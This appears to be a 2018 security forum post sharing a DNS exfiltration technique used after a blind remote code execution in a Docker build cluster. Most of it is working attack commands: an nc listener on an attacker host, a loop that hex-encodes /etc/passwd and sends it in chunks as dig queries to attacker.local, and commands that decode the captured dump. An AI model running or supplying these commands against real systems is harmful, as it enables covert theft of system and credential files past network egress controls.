DNS Exfiltration (oneliner)

Postby **anonymousspammer** » Tue Aug 21, 2018 2:41 pm

So today I came across an interesting situation where I have a blind RCE in a dock, part of a large cluster of dockers building the mobile application I tested. Interesting in it was that only UDP / 53 (DNS) was allowed as Outbound traffic and I want to share the decision how to filter out DNS data with my favorite oneliners:

The shells used are standard for many * nix systems: xxd, dig, nc

This is our listener-a of attacker.local:

Code: Select all

┌─╼[~] 
└╼  sudo nc -l -n -vv -p 53 -u -k

And this is the code we run on the server:

Code: Select all

$ for x in $(xxd -p -c16 /etc/passwd); do dig $x @attacker.local; done

Also, if you save the resulting information to a file using:

Code: Select all

sudo nc -l -n -vv -p 53 -u -k > /tmp/dump

You can easily review what you've taken with:

Code: Select all

xxd -p -r /tmp/dump